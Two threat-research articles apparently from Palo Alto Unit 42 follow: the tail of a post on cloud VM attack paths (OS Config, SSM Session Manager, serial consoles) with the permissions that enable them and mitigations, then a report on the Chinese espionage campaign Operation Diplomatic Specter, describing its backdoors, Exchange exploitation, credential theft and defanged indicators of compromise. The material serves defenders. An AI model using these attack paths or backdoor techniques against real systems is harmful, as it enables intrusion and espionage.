    • osconfig.osPolicyAssignments.list

Mitigations:

  • Restrict and monitor the use of the osconfig.patchJobs.exec and osconfig.osPolicyAssignments.update permissions.
  • Disable the Patch and OS policies feature by setting the osconfig-disabled-features metadata key at the project level.
  • Disable OS Config in the metadata at the project level if it is not needed.
  • Uninstall the OS Config agent if it is not needed.

SSH Over Middleware

AWS: Use SSM Session Manager to Log into a VM

AWS SSM Session Manager provides a secure and auditable way to log into nodes using IAM. Nodes with Session Manager don’t need to have open inbound ports and users logging into the nodes don’t need to manage the private keys.

Session manager can also be configured on nodes in multi-cloud or hybrid cloud environments. If attackers gain permissions to perform the session manager’s actions, they could potentially abuse the feature to log into VMs with the session manager running.

Conditions:

  • The SSM agent is installed and activated.
  • The VM’s instance profile has the following permissions:
    • ssmmessages:CreateControlChannel
    • ssmmessages:CreateDataChannel
    • ssmmessages:OpenControlChannel
    • ssmmessages:OpenDataChannel
    • ssm:UpdateInstanceInformation
  • The principals have the following permissions to connect to the VM:
    • ssm:StartSession
    • ssm:ResumeSession
    • ssm:TerminateSession

Mitigations:

  • Restrict and monitor the use of the ssm:StartSession and ssm:ResumeSession permissions.
  • Revoke ssmmessages permissions from VMs that are not managed by the session manager.
  • Deactivate Default Host Management Configuration if it is not needed.
  • Uninstall the SSM agent if it is not needed.

Serial Console Access

Most cloud service providers offer serial console access as a feature to troubleshoot boot and network configuration issues in VMs. This feature provides text-based console access to VMs, independent of the network and operating system state.

Because network-based access control does not apply to serial console access, attackers with serial console permissions could potentially abuse this feature to bypass network-based firewall restrictions and gain unauthorized access to VMs. It is important to note that the serial console access does not bypass the user authentication. Valid passwords or private keys are still needed to log into a VM.

AWS: Login via Serial Ports

Amazon EC2 Serial Console provides access to the serial port of EC2 instances.

Conditions:

  • Serial console access must be enabled at the account level.
  • Principals with the ec2:EnableSerialConsoleAccess permission can enable access.
  • The VM must be one of the supported instance types. Most instances built on the Nitro System are supported.
    • Principals with the ec2:ModifyInstanceAttribute permission can change a VM’s instance type.
  • The principals must have a valid password or permission to push the SSH public key to the instance.
    • The principals with the ec2-instance-connect:SendSerialConsoleSSHPublicKey permission can push the SSH key into a VM via the serial console.

Mitigations:

  • Disable serial console access at the account level.
  • Restrict and monitor the use of ec2:EnableSerialConsoleAccess and ec2-instance-connect:SendSerialConsoleSSHPublicKey permissions.

Azure: Login via Serial Ports

Azure Serial Console provides text-based console access to VM instances.

Conditions:

  • Serial Console is enabled at the subscription level. (It is enabled by default.)
  • The VM’s boot diagnostic is enabled.
  • The VM Guest OS has the terminal management service enabled (e.g., getty in Linux and SAC in Windows). (They are enabled by default.)
  • The VM Guest OS has text-based user authentication configured for local logins, (e.g., valid user/password).
  • The principals have the following permissions to connect to a VM via serial port:
    • Microsoft.Compute/virtualMachines/start/action
    • Microsoft.Compute/virtualMachines/read
    • Microsoft.Compute/virtualMachines/write
    • Microsoft.Resources/subscriptions/resourceGroups/read
    • Microsoft.Storage/storageAccounts/listKeys/action
    • Microsoft.Storage/storageAccounts/read
    • Microsoft.SerialConsole/serialPorts/connect/action

Mitigations:

  • Restrict and monitor the use of the Microsoft.SerialConsole/serialPorts/connect/action permission.
  • Disable serial console access at the subscription level.
  • Disable boot diagnostic for individual VMs.
  • Disable terminal management service for individual VMs.
  • Disable text-based authentication for local logins, such as user/password for individual VMs.

GCP: Login via Serial Ports

GCP provides an alternative way to connect to a VM over a serial port. Compute Engine serial port access can be enabled in the metadata service by updating the serial-port-enable metadata key.

Conditions:

  • The guest agent is installed and activated on the VM.
  • The principals have the following permissions to update a VM’s metadata:
    • compute.instances.setMetadata (via VM’s instance metadata)
    • compute.projects.setCommonInstanceMetadata (via project-wide metadata)
    • iam.serviceAccountUser role on the Instance’s service account

Mitigations:

  • Restrict and monitor the use of the compute.instances.setMetadata and compute.projects.setCommonInstanceMetadata permissions.
  • Restrict and monitor the use of the iam.serviceAccountUser role
  • Disable serial port access through organization policy.
  • Disable the OS Config agent on the VM.

Conclusion

This post provides an overview of potential attack paths into VMs and outlines the mitigation strategies that organizations can implement to enhance their cloud security. Maintaining the security posture of VMs in cloud environments is crucial.

Due to their widespread use and inherent permissions from workload identities, VMs are attractive targets for attackers. All the attack paths discussed throughout this post are based on the intended features of legitimate use cases. However, if these features are not properly secured, adversaries can abuse them with malicious intent. The responsibility of safeguarding these attack paths and mitigating potential risks lies with the cloud users.

IAM configuration plays a pivotal role in both enabling these attack paths and mitigating their associated risks. To ensure robust cloud security, it is vital to continuously identify these attack paths and monitor the use of risky permissions.

As cloud environments continue to evolve, so too will the TTPs employed by cyberattackers. Organizations must remain vigilant and proactive in their cloud security efforts, adapting their strategies to counter evolving threats.

Palo Alto Networks Protection and Mitigation

Palo Alto Networks customers are better protected from the threats discussed above through the following products:

  • Prisma Cloud customers are better protected by the attack path policies that continuously monitor and alert potential attack paths.
  • Cortex XDR detects and blocks exploits and evasive cloud-based attacks.
  • Cortex Xpanse can detect shadow IT running in public cloud providers and help bring these resources under management.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Additional Resources

Palo Alto Networks

AWS

Azure

GCP

Others

 

Operation Diplomatic Specter: An Active Chinese Cyberespionage Campaign Leverages Rare Tool Set to Target Governmental Entities in the Middle East, Africa and Asia

Executive Summary

A Chinese advanced persistent threat (APT) group has been conducting an ongoing campaign, which we call Operation Diplomatic Specter. This campaign has been targeting political entities in the Middle East, Africa and Asia since at least late 2022.

An analysis of this threat actor’s activity reveals long-term espionage operations against at least seven governmental entities. The threat actor performed intelligence collection efforts at a large scale, leveraging rare email exfiltration techniques against compromised servers.

This collection effort includes attempts to obtain sensitive and classified information about the following entities, focusing on current geopolitical affairs:

  • Diplomatic and economic missions
  • Embassies
  • Military operations
  • Political meetings
  • Ministries of the targeted countries
  • High-ranking officials

As part of its espionage activities, the group makes use of a previously undocumented family of backdoors, including those that we have named TunnelSpecter and SweetSpecter.

The threat actor appears to closely monitor contemporary geopolitical developments, attempting to exfiltrate information daily. The threat actor’s modus operandi in cases we observed was to infiltrate targets’ mail servers and to search them for information. We observed multiple efforts to maintain persistence, including repeated attempts to adapt and regain access when the actor’s activities were disrupted. They also appear to return to the well to search for relevant information when new geopolitical events occur.

We assess with high confidence that a single threat actor orchestrates Operation Diplomatic Specter, operating on behalf of Chinese state-aligned interests. The tactics observed as part of this campaign show the extent to which Chinese state-aligned threat actors attempt to gather information about affairs beyond the Asian region, even extending into the Middle East and Africa.

It is unclear exactly how threat actors are using the intelligence collected as part of this campaign. However, the topics the threat actors searched for reveal information about many key players in these regions and their connections to China and other parts of the world. The topics they searched for provide researchers a window into the possible priorities of Chinese state-aligned threat actors.

In addition, the threat actor’s repeated use of Exchange server exploits (ProxyLogon CVE-2021-26855 and ProxyShell CVE-2021-34473) for initial access further emphasizes the importance for organizations to harden and patch sensitive internet-facing assets. This is especially true for known and prominent vulnerabilities, to reduce the attack surface and maximize protection efforts.

Organizations that safeguard sensitive information should pay particular attention to commonly exploited vulnerabilities. They should also adhere to best practices when it comes to IT hygiene, as APTs often seek to gain access through methods they know have been effective in the past.

Lastly, we are sharing our analysis to provide defenders with means to detect and protect themselves against such advanced attacks.

Palo Alto Networks customers are better protected against Operation Diplomatic Specter through the following:

  • Network Security: Delivered through a Next-Generation Firewall (NGFW) configured with machine learning enabled and cloud-delivered security services. This includes Advanced Threat Prevention, Advanced URL Filtering, Advanced DNS Security and WildFire, a malware protection engine capable of identifying and blocking malicious samples and infrastructure.
  • Security Automation: Delivered through a Cortex XSOAR or XSIAM solution capable of providing SOC analysts with a comprehensive understanding of the threat derived by stitching together data obtained from endpoints, network, cloud and identity systems.
  • Anti-Exploit protection: Delivered through Cortex XSIAM and provides protection against exploitation of different vulnerabilities including ProxyShell and ProxyLogon.
  • Cloud Security: Prisma Cloud Compute and WildFire integration can help detect and prevent malicious execution of the Specter backdoor within Windows-based VM, container and serverless cloud infrastructure.

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics China, Backdoor

Operation Diplomatic Specter Motivation and Victimology

The threat actor behind Operation Diplomatic Specter searches for information on politicians, military operations and personnel, as well as governmental ministries, with a particular focus on foreign affairs ministries and embassies. Figure 1 shows the regions where the threat actor targets organizations in the Middle East, Africa and Asia.

Image 1 is a map where circles identify the regions targeted in Operation Diplomatic Spector. These regions include Africa, the Middle East, and southeast Asia.
Figure 1. Regions targeted in Operation Diplomatic Specter.

Moreover, the threat actor appears to closely monitor contemporary geopolitical developments, demonstrating an intent to acquire information associated with ongoing events. The campaign has been operating since at least late 2022, with automatic exfiltration attempts occurring daily, in addition to periodic efforts involving more hands-on-keyboard attention from the threat actor.

These events encompass a wide range of subjects, including the following:

  • Military operations
  • Meetings
  • Summits
  • Conflicts
  • Other pertinent aspects of current geopolitical affairs

In some cases, the threat actor searched for particular keywords and exfiltrated anything they could find related to them, such as entire archived inboxes belonging to particular diplomatic missions or individuals. The threat actor also exfiltrated files related to topics they were searching for.

In other cases, the threat actor’s exfiltration appeared more targeted and exfiltration focused on the results of more specific searches. Searches observed related to the following topics:

  • China-related geopolitical and economic information (meetings, summits, relationship with other countries, information related to President Xi)
  • OPEC and energy industry
  • Ministry of Foreign Affairs and embassies worldwide
  • Ministry of Defense
  • Military (operations, drills, code words, military units and personnel)
  • The relationship of the targeted countries with the Biden administration
  • Local and international political figures
  • Geopolitical and economical information
  • Telecommunications technology used by the targeted entities

Figure 2 shows an example of the automated mailbox harvesting of one of the affected countries’ embassies and diplomatic missions.

Image 2 is a screenshot of code of email inbox targets of certain embassies. These are bolded in orange or black and include Washington, DC, Paris, London and Moscow.
Figure 2. Example of embassies’ email boxes targeted by the threat actor.

Figures 3 and 4 show examples of threat actors targeting mailboxes of the ministry of foreign affairs, ministry of defense, as well as military organizations including the navy, air force and specific task forces of the targeted country.

Image 3 is a screenshot of code of email inbox targets of certain embassies. These are bolded in orange or black and include the Ministry of Foreign Affairs, the Navy and the Ministry of Defense.
Figure 3. Example of embassies’ email boxes targeted by the threat actor.
Image 4 is a screenshot of an alert in Cortex XDR with some of the information redacted. The process access Outlook files. The user who ran the process with NT authority system. The access files are mostly redacted.
Figure 4. Example of embassies’ email boxes targeted by the threat actor.

Investigating the Actor Behind Operation Diplomatic Specter

Operation Diplomatic Specter is the name we’ve given to the espionage campaign described above. The details we’re sharing about this campaign are part of our ongoing investigation into an apparent Chinese state-aligned APT group.

Since late 2022, we have been tracking an activity cluster targeting governmental entities in the Middle East, Africa and Asia. In earlier stages of our tracking, we referred to the cluster as "CL-STA-0043,” indicating a cluster of activity that we suspect is associated with state-backed motivation (as described in “It’s All in the Name: How Unit 42 Defines and Tracks Threat Adversaries”).

We published on CL-STA-0043 in June 2023 in “Through the Cortex XDR Lens: Uncovering a New Activity Group Targeting Governments in the Middle East and Africa.”

In December 2023, Unit 42 published additional information related to CL-STA-0043 in “New Tool Set Found Used Against Organizations in the Middle East, Africa and the US.”

The tactics, techniques and procedures (TTPs) associated with the threat actor behind this cluster are relatively unique and rare. Some of these TTPs had not been reported as being used in the wild before, and some were reported used only a handful of times. For in-depth details of the TTPs observed in association with Operation Diplomatic Specter, please see Appendix A.

The threat actor demonstrated adaptability in attempting to thwart various mitigation efforts. They also sought to maintain a persistent presence in compromised environments through the use of two novel and previously undocumented malware strains – SweetSpecter and TunnelSpecter.

We will cover the key details of these backdoors in the following section, Meet the Specter Family. For a deeper dive, please see Appendix B.

After meticulously monitoring the threat actor's activities, evolution and changes over a year, we graduated the activity cluster CL-STA-0043 to a temporary actor group (TGR-STA-0043) according to Unit 42’s cluster maturation process. Essentially, the graduation indicates our confidence that a single actor is behind the activity observed, and that we’ve established “several correlation points over time and across activity clusters.”

In relation to this process, we note that the threat actor appears to be aligned with Chinese state interests and bears the hallmarks of Chinese APTs. For more details of this attribution, please read the section on Connection to the Chinese Nexus. For more in-depth details, please see Appendix C.

Meet the Specter Family – Cousins of Gh0st RAT

One of the TTPs that most characterizes TGR-STA-0043 (and Operation Diplomatic Specter) is the use of custom-built backdoors that were not publicly observed before. During our investigation, we uncovered a pair of unique and stealthy backdoors that we call the Specter family, including TunnelSpecter and SweetSpecter.

We named the pair the Specter family to acknowledge a similarity to Gh0st RAT (described below). TunnelSpecter’s name refers to its DNS tunneling functionality and SweetSpecter’s name references similarities to the SugarGh0st RAT specifically.

The attackers used these backdoors to maintain stealthy access to their targets’ networks. The backdoors also provided them with the ability to execute arbitrary commands, exfiltrate data, and deploy further malware and tools on the infected hosts.

According to our analysis, we believe with a high level of confidence that these two distinct backdoors borrowed small portions of code from the Gh0st RAT source code that was leaked in 2008. However, these new backdoors appear to differ from other known Gh0st RAT variants.

TunnelSpecter Key Features

  • Custom tailored for a specific target, it created a rogue user that we found on that specific target
  • It implemented data encryption and exfiltration over DNS tunneling for increased stealth
  • It executed arbitrary commands and storage of configuration data in a rarely seen registry key

SweetSpecter Key Features

  • It communicated with the C2 using encrypted zlib packets transmitted over raw TCP stream, in typical Gh0st RAT fashion
  • Its compilation time was in correlation with a unique campaign ID format, using a month and year as a campaign identifier
  • It used unique registry keys to store other configuration data

It is noteworthy that we found a sample of Gh0st RAT in the same location as the Specter backdoors, further strengthening the connection. On top of that, all of these backdoors communicated with the same embedded infrastructure – subdomains of microsoft-ns1[.]com, as shown in Figure 5.

Image 5 is a diagram of the sample and malware family used in the campaign. Gh0st RAT, TunnelSpecter and SweetSpecter all point to the same domain.
Figure 5. The Gh0st RAT sample and Specter malware family used in Operation Diplomatic Specter.

For an in-depth analysis of TunnelSpecter and SweetSpecter, please refer to Appendix B.

A Gh0st RAT Variant Blasts From the Past

One of the types of malware used during the attacks associated with Operation Diplomatic Specter is the infamous Gh0st RAT malware family. We observed that threat actors attempted to use it to maintain a foothold in the compromised environments.

The first Gh0st RAT binary that we encountered during the attacks was a large file (approximately 280 MB) by the name Tpwinprn.dll. This file that the web shell dropped under the SysWOW64 folder was executed using a renamed rundll32.exe process.

When investigating this binary, we found that it has a notable string in memory: Game Over Good Luck By Wind. Figure 6 shows that this string was also observed in the Gh0st RAT variant used in Operation Iron Tiger [PDF] back in 2015. Iron Taurus, aka APT27, carried out this operation.

Image 7 is a screenshot of a report. To the left is text in the report. To the right is a string highlighted in orange among other lines of code.
Figure 6. Game Over Good Luck By Wind mentioned in Operation Iron Tiger. Source: “Operation Tiger: Exploring Chinese Cyber-Espionage Attacks on United States Defense Contractors” [PDF] (p. 29).

Connection to the Chinese Nexus

Our investigation revealed strong connections and overlaps that tie the group behind Operation Diplomatic Specter to the Chinese nexus of espionage-focused threat actors. These connections and overlaps, covered in greater detail in Appendix C, consist of the following facets:

  • Infrastructure: The activity in Operation Diplomatic Specter originated from a shared Chinese APT operational infrastructure, exclusively used by Chinese nation-state threat actors, such as Iron Taurus (aka APT27), Starchy Taurus (aka Winnti) and Stately Taurus (aka Mustang Panda).
  • Activity time frame: Statistical breakdown analysis of the hands-on-keyboard interactive activity of the threat actors, corresponds to 09:00-17:00 working hours in UTC +8. This corresponds to several Asian countries, including China. Historically, many Chinese nation-state threat actors have been observed operating in this time frame.
  • Linguistic artifacts: Several tools and files dropped by the threat actors included numerous comments and debug strings in Mandarin, suggesting that the scripts’ creators may be Mandarin-speaking individuals.
  • Tools and malware commonly used by Chinese APTs: Aside from the unique tools and malware, the threat actor also extensively used tools that are popular among Chinese threat actors, such as:
    • Customized Gh0st RAT samples
    • PlugX
    • Htran
    • China Chopper

While any threat actor can use these tools, they are mostly observed being used (especially together) in attacks involving Chinese threat actors.

  • Use of Chinese VPS: The attackers used Chinese VPS providers, such as Cloudie Limited and Zenlayer, for several of their C2 servers.

Conclusion

The exfiltration techniques observed as part of Operation Diplomatic Specter provide a distinct window into the possible strategic objectives of the threat actor behind the attacks. The threat actor searched for highly sensitive information, encompassing details about military operations, diplomatic missions and embassies and foreign affairs ministries.

Our research spanned over a year and tightly monitored this activity, revealing that the threat actor (which we track as TGR-STA-0043) possesses potential motivation and modus operandi aligned with Chinese APT groups.

Besides using a rare set of tools TGR-STA-0043 stands out for its persistence and adaptability. The threat actor unabashedly resumes operations even after exposure, displaying a flagrant element to its nature.

Notably, TGR-STA-0043 continues to leverage known vulnerabilities in internet-facing servers. This underscores the need for heightened vigilance and fortified cybersecurity measures across global governments and organizations.

A resilient defense mechanism is not only essential for thwarting evolving cyberthreats but also for preserving the confidentiality, integrity and availability of critical information. In cultivating a strong security posture, nations can better safeguard their interests, protect against potential vulnerabilities and ensure the overall resilience of their cybersecurity frameworks.

Protections and Mitigations

For Palo Alto Networks customers, our products and services provide the following coverage associated with this group:

  • WildFire cloud-delivered malware analysis service accurately identifies the known samples as malicious.
  • Advanced URL Filtering and Advanced DNS Security identify domains associated with this group as malicious.
  • Cortex XDR and XSIAM are designed to:
    • Prevent the execution of known malicious malware, and also prevent the execution of unknown malware using Behavioral Threat Protection and machine learning based on the Local Analysis module.
    • Protect against credential gathering tools and techniques using the new Credential Gathering Protection available from Cortex XDR 3.4.
    • Protect from threat actors dropping and executing commands from web shells using Anti-Webshell Protection, newly released in Cortex XDR 3.4.
    • Protect against exploitation of different vulnerabilities including ProxyShell and ProxyLogon using the Anti-Exploitation modules as well as Behavioral Threat Protection.
    • Detect post-exploit activity, including credential-based attacks, with behavioral analytics, through Cortex XDR Pro.
  • Prisma Cloud Compute and WildFire integration can help detect and prevent malicious execution of the Specter backdoor within Windows-based VM, container and serverless cloud infrastructure.

If you think you might have been impacted or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Palo Alto Networks has shared these findings, including file samples and indicators of compromise, with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Indicators of Compromise

Malware

TunnelSpecter

Loader:

  • 0e0b5c5c5d569e2ac8b70ace920c9f483f8d25aae7769583a721b202bcc0778f

Encrypted payload

  • 62dec3fd2cdbc1374ec102d027f09423aa2affe1fb40ca05bf742f249ad7eb51

Decrypted payload:

  • 22d556db39bde212e6dbaa154e9bcf57527e7f51fa2f8f7a60f6d7109b94048e

Mutex:

  • “blogs.bing.com”

SweetSpecter

Loader:

  • 0b980e7a5dd5df0d6f07aabd6e7e9fc2e3c9e156ef8c0a62a0e20cd23c333373

Encrypted payload:

  • 8198c8b5eaf43b726594df62127bcb1a4e0e46cf5cb9fa170b8d4ac2a4dad179

Decrypted payload:

  • 0f72e9eb5201b984d8926887694111ed09f28c87261df7aab663f5dc493e215f

Gh0st RAT

  • d5a44380e4f7c1096b1dddb6366713aa8ecb76ef36f19079087fc76567588977

Infrastructure

Domains

  • home.microsoft-ns1[.]com
  • cloud.microsoft-ns1[.]com
  • static.microsoft-ns1[.]com
  • api.microsoft-ns1[.]com
  • update.microsoft-ns1[.]com
  • labour.govu[.]ml
  • govm[.]tk

IPs

  • 103.108.192[.]238
  • 103.149.90[.]235
  • 192.225.226[.]217
  • 194.14.217[.]34
  • 103.108.67[.]153

Additional Resources

Appendix A: Main TTPs Observed in Operation Diplomatic Specter

Image 7 is a chart of the TTPs used in the campaign, categorized by Intrusion, Reconnaissance, Privilege Escalation, Credential Theft, Lateral Movement and Data Theft.
Figure 7. TGR-STA-0043’s characteristics broken down by the attack lifecycle observed as part of Operation Diplomatic Specter.

As part of our observations of Operation Diplomatic Specter, we saw a distinctive set of TTPs. These TTPs indicate a high level of coordination, technical skill and determination – characteristics often associated with a nation-state threat actor. We previously wrote a deep technical analysis of the flow of the attack and the main TTPs.

Overview of TGR-STA-0043’s Tools and Malware

Tools Malware
Htran
Yasso
JuicyPotatoNG
Nbtscan
Scansql
Ladon
Samba SMB client
Impacket
SharpEfsPotato
Iislpe
Mimikatz
TunnelSpecter
SweetSpecter
Agent Racoon
Ntospy
PlugX
Gh0st RAT
China Chopper

Table 1. TGR-STA-0043’s tools and malware.

A review of the main TTPs follows:

Targeted Data Exfiltration From Exchange Servers

In the context of targeted data exfiltration, TGR-STA-0043 exhibited a meticulous approach, particularly when abusing the Exchange Management Shell for stealing hundreds of emails and adding PowerShell snap-in (PSSnapins) to steal emails through a script. The threat actor strategically used those techniques to steal sensitive emails by employing specific keywords for data identification. Those keywords served as critical indicators enabling us, as researchers, to gain a precise understanding of the information targeted by TGR-STA-0043.

Credential Theft Using Network Providers

Within the realm of credential theft, TGR-STA-0043 showcased a variety of credential theft methodologies. While deploying well-known techniques such as Mimikatz and dumping the Sam key, the threat actor also introduced an uncommon credential theft tactic.

This novel approach involved the execution of a PowerShell script to register a new network provider, a method recognized as a proof of concept (PoC) named NPPSpy, and alternatively known as Ntospy by Unit 42. This technique is rare and has been reported only a handful of times in the past.

In-Memory VBS Implant

To infiltrate the network, TGR-STA-0043 strategically focused on exploiting vulnerabilities within Microsoft Exchange servers and public-facing web servers. The threat actor successfully gained access to specific targeted environments through the deployment of in-memory VBScript implants. This tactic not only underscored TGR-STA-0043's technical proficiency but also highlighted their ability to execute web shells in a clandestine manner on-the-fly, while attempting to bypass security mitigations.

Debut of the Yasso Penetration Tool Set

The emergence of a relatively new penetration testing tool set, Yasso, marked a shift in the tactics employed by TGR-STA-0043. This tool set encompassed a range of functionalities, including the following:

  • Scanning
  • Brute forcing
  • Remote interactive shell capabilities
  • Arbitrary command execution

What set Yasso apart was its unique feature set, incorporating powerful SQL penetration functions and database capabilities. Until the time of this article, this had not been publicly reported as being used in the wild by another threat actor.

Appendix B: Additional Technical Details on the Backdoors

TunnelSpecter

TunnelSpecter is a previously undocumented custom backdoor that the threat authors specifically customized for the target. Figure 8 shows that threat authors hard-coded this backdoor with a unique username, SUPPORT_388945c0. Notably, this username is a deliberate attempt to mimic the default account SUPPORT_388945a0, commonly associated with the Windows Remote Assistance feature.

An indication of the tailored nature of this malware is the preemptive creation of the same account (SUPPORT_388945c0). The threat actor created this account using a web shell within the compromised environment several weeks prior to the deployment of TunnelSpecter. The threat actor used TunnelSpecter to create the user, in the event that they failed to create it using the web shell. They then added the user (newly or previously created) to the Administrators group.

Image 8 is a screenshot of many lines of code. Highlighted in a red box is the embedded username and password.
Figure 8. Embedded username and password in TunnelSpecter.

The main functionality of TunnelSpecter includes:

  • Fingerprinting the infected machine and creating a unique identifier for each infected host, based on the CRC32 hash of the machine's cpuid value.
  • Executing arbitrary commands by implementing a remote command-line interface. The supported commands can gather different information about the infected machine, such as the operating system version or host details.
  • DNS tunneling C2 communication while encrypting communication using a hard-coded Caesar cipher on top of hex encoding. When transmitting data, TunnelSpecter prepends the unique machine identifier followed by a predetermined flag (b, c, d or z) and then the stolen data content. Figure 9 below shows this communication.
Image 9 is a screenshot of many lines of code as TunnelSpecter implements a DNS tunneling communication.
Figure 9. DNS tunneling communication implemented in TunnelSpecter.

As shown in Figure 10, Cortex XDR prevented TunnelSpecter, recognizing it as a suspicious DLL.

Image 10 is a screenshot of a Cortex XDR Prevention Alert.
Figure 10. Prevention alert for TunnelSpecter, raised by Cortex XDR.

Although we could not see a clear similarity between TunnelSpecter and Gh0st RAT, the malware shared similarity with the second backdoor discovered, SweetSpecter (described below).

SweetSpecter

Based on our analysis of the SweetSpecter malware, we believe it was written by the same author as TunnelSpecter. We found that it shares code similarities with TunnelSpecter and SugarGh0st RAT. This RAT is a relatively new variant of Gh0st RAT that emerged in November 2023 and that researchers at Talos observed targeting governments in Asia.

SweetSpecter implements Gh0st RAT’s known TCP communication scheme by sending a zlib compressed TCP packet to the command and control server. SweetSpecter also performs add and xor operations with the value 0x5f to add an encryption layer and thwart network-based signatures.

The “Gh0st” header is absent in this variant, and it is randomized instead based on the seed value received from GetTickCount. Figure 11 below shows an example of the transmitted data:

  1. The aforementioned random value.
  2. The random value from (1) XORed with 0x2341, another value hard-coded in SweetSpecter.
  3. The length of the compressed buffer including the preliminary 12 header bytes.
  4. The length of the decompressed buffer.
  5. The zlib magic bytes 0x789c that are added by and XORed with 0x5f.
Image 11 is a screenshot of the compressed and encrypted TCP packet. Highlighted by numbers 1 through 5 are important transmitted data.
Figure 11. The content of the zlib compressed and encrypted TCP packet.

Similarities with SugarGh0st RAT include:

  • Using the HKLM\SOFTWARE\WOW6432Node\ODBC registry key
  • Using the GPINFO registry key and default value as a second campaign identifier
  • Campaign ID format, using a string representing a month and a year (i.e., 2023.03) as shown in Figure 12
Image 12 is a screenshot of the campaign’s ID string.
Figure 12. Campaign ID string similarity between SweetSpecter and SugarGh0st RAT.

Finally, similarities with TunnelSpecter include:

  • Using the HKLM\SOFTWARE\WOW6432Node\ODBC registry key
  • Generating the same user identifier by using the cpuid command
  • Generating a mutex containing a domain name
  • Similar initial system profiling and data sent to the C2

As shown in Figure 13, Cortex XDR prevented SweetSpecter, recognizing it as a suspicious DLL.

Image 13 is a screenshot of a Cortex XDR Prevention Alert.
Figure 13. Prevention alert for SweetSpecter, raised by Cortex XDR.

Appendix C: Additional Details on the Attribution to the Chinese Nexus

Infrastructure

Over the span of a year, we have been tracking and monitoring the infrastructure intricacies related to TGR-STA-0043. We noticed the changes in the C2 servers used by the threat actor, and we monitored these alterations.

In addition, we were able to uncover additional servers that are part of this complex operational infrastructure by pivoting on strategic data points, based on the already established knowledge of the infrastructure.

Our investigation revealed indications that threat actors employed a substantial portion of the correlated infrastructure, either presently or historically, as C2 servers for two prominent pieces of malware: PlugX and Trochilus RAT. These two pieces of malware (especially PlugX) are largely associated with Chinese threat actors. However, other threat actors can access and use them as well.

As depicted in Figure 14 below, we found multiple IP addresses related to the infrastructure, as well as domains and subdomains. A particularly noteworthy facet of our observations pertains to the threat actor's deliberate endeavors to assume the guise of both legitimate Microsoft servers (e.g., *.microsoft-ns1[.]com) and governmental entities. For example, *.govu[.]ml masquerades as a Mali-government address. (The threat actor’s impersonation does not imply any issues with the legitimate servers or governmental entities.)

Image 14 is a Maltego graph tracking the infrastructure. A mix of icons denote the IP addresses, domains and subdomains, and other parts of their network.
Figure 14. Maltego graph of the pivoting on the infrastructure used in Operation Diplomatic Specter.

Overlaps

As shown in the Maltego graph above, there are multiple overlaps between the infrastructure leveraged in Operation Diplomatic Specter and different operations, all associated with Chinese APTs.

IP Address Overlaps

The first overlap observed involves the IP address 192.225.226[.]217, used as one of the main C2 servers for the threat actor to communicate with at least one target. This IP was also observed in three different operations:

SSL/TLS Certificate Overlaps/Pivoting

The other overlaps observed are related to the use of the same SSL certificate (SHA256: 3d74df40e3d2730941ff64f275217ae6d46b20d7fbbd04123bc156daf8f6e85c). This certificate was observed in multiple servers, some of which were overlapping with different activities, all associated with Chinese APTs.

The certificate pivoting led to the following IP addresses overlaps:

  • The IP address 27.255.79[.]17 resolves to the domain poer.whoamis[.]info. It was mentioned in the context of Operation Earth Berberoka [PDF], which was attributed to Iron Taurus. It was also mentioned in connection to Starchy Taurus (aka Winnti).
  • The IP address 108.61.178[.]125 that resolves to airjaldinet[.]ml, was mentioned in two operations: Storm Cloud and Holy water. These two operations were linked to Chinese APTs with different confidence levels, but they were not attributed to any specific group. In addition, the IP address 192.225.226[.]196, resolves to safer.ddns[.]us. It was also mentioned in the analysis of Operation Exorcist [PDF] mentioned above.

Activity Time Frame

During our analysis of compromised assets, we successfully traced the time frame of the threat actor's interactive sessions, focusing on hands-on-keyboard commands received from web shells and backdoors. Extensive mapping of the activity's working hours over several months revealed a notable and consistent pattern.

Figure 15 below shows our findings indicate a strong alignment with a standard 9-to-5 workday within the UTC+8 time zone. This time frame notably corresponds to the working hours of several Asian countries, including but not limited to China.

Image 15 is a diagram of the hourly activity mapped between standard Universal Time in red and the UTC+8 time in green, comparing a standard workday of 9:00 AM to 5:00 PM. The hours correspond.
Figure 15. TGR-STA-0043 hourly breakdown of activity.

Linguistic Artifacts

During our investigation, we acquired several scripts and files that prominently feature numerous comments and debug strings in Mandarin, suggesting that the scripts’ creators are Mandarin-speaking individuals. One of those files is a web shell found on one compromised environment.

Further inspection of the code revealed a subtle resemblance between the code in the web shell we obtained and a GitHub repository of a penetration testing PoC tool. This tool is named GetShell, and was created three years ago.

It is possible that the web shell used by the threat actor borrowed code from this existing repository. However, the threat actor appears to tailor the code to suit specific targets, modifying it based on the nature of the targeted data.

In particular, we identified a customized version of this web shell deployed on the Exchange servers of one of the targets. This modified version, named ManagementMailboxPicker.aspx, demonstrated functionalities focused on file uploads and not limited to images, as shown in Figure 16.

Our analysis suggests that the threat actor leveraged this web shell to manage the upload of files, potentially .pst and archive files containing email data. The nomenclature ManagementMailboxPicker.aspx further implies its role in the manipulation of mailbox-related activities.

Image 16 is a screenshot of many lines of code. Three lines are indicated by arrows that contain Chinese characters. From top to bottom: Save file address. File allowed formats. File size limit in KB.
Figure 16. Mandarin strings observed in the sample.

Tools and Malware Commonly Used by Chinese APTs

Another facet of strengthening the connection to a Chinese threat actor lies in the tools and malware employed during the operation. We observed multiple tools and malware commonly associated with a diverse range of Chinese threat actors, including:

  • Gh0st RAT
  • PlugX
  • China Chopper
  • Htran

While many Chinese threat actors seem to favor these tools, it's crucial to emphasize that the mere presence of these tools and malware does not singularly establish a link or attribution to Chinese threat actors. While these tools are prevalent among such actors, they are not exclusive to this context and are accessible for use by other threat actors as well.

Use of Chinese VPS

